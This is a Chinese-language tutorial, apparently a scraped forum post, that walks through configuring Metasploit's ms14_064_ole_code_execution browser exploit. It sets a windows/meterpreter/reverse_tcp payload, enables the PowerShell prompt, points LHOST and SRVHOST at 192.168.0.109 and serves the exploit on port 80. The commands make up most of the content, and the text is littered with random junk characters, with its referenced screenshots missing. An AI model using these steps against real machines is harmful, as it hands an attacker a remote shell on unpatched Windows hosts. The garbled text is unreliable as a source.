# O( A5 w* N0 Y* V$ Y8 R2 ] 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
6 h+ ]4 H) s$ z0 z+ ?. r
6 b5 n0 `, V$ @" {- a% Z
: J: f* ~8 r/ D 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
: v* S% v7 I: X" I. L
& l, H* I8 h7 N( p8 ?1 I* g% K( ~
4 A7 w9 h& }3 E# \ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp6 y: n3 _! h& ^+ e$ O6 j g+ R
6 F) Y+ ^ J/ a4 p: z- u( o$ `5 F# n% Z3 x
set AllowPowershellPrompt true+ e' R# I# @3 `+ M/ L
W I& c- M4 \: M* T* z5 Q) R1 |
5 i; u$ l: J% I2 b3 ~+ b W) U* h Set LHOST 192.168.0.109
+ m1 r* m N( Q( p3 \8 C1 n7 m
! u% g) i( W0 K8 T& c$ J
! I! {3 j: N0 P- h# ^" M4 Z set SRVHOST 192.168.0.109
6 J; `- e6 G1 D) s2 u% F% }7 {
. _2 n) ]$ s( J. d% T7 m
9 _# M, s" J# r5 ? Set uripath share
1 O" i1 P1 B# J
! l0 }2 P! D1 ~/ s# M" ~$ a0 o
* N/ i3 f* L. w1 b Set srvport 80- J. [+ q$ v7 c' f( y: A( y
) d. C% x& y8 |! t$ x/ Z, y
1 k- w3 p# f& Q" O4 g' U8 Q
) A: t5 Y' }' v3 N
7 u0 [; K. I; j' F9 \' {3 g
* |- l/ \5 \7 c: T 1 N/ z- h- g' S) W9 I* \
% c; y3 D7 h: U/ H. n) s
* l3 Q% J: Y+ x7 j7 `' x ; p3 U+ N. a1 z$ b1 e
. r, u7 n4 G3 \8 [8 q1 Y2 d6 u' b7 C- B/ M* U
, C; _! K5 ~$ C
1 W) v! N8 J3 u2 D
" X) M) G0 \: [+ H 3 [& _. f+ Z* B5 J. Z. L
5 C) t& p n2 L0 D" k+ \9 y& G+ S) Y! f5 w! [
下面我们来访问本地地址如图:
. x* Q% V5 Z. ?) G8 \
" y3 R& O' n( U( z/ q/ T0 A2 n. a9 \
" W$ [" t8 A$ w' A, c" Y/ n
0 n0 K# o0 x7 B; q
. d" ^( l' @5 r0 ~- k0 H! W+ z& o7 P. H2 j5 b& P
2 h5 D2 O( a& U5 J1 X+ w. x
+ A4 q8 j7 b( ?8 ~/ a7 s
8 R) W% C. s9 W. e' }$ ?8 F
% p U7 e5 R/ R9 o5 w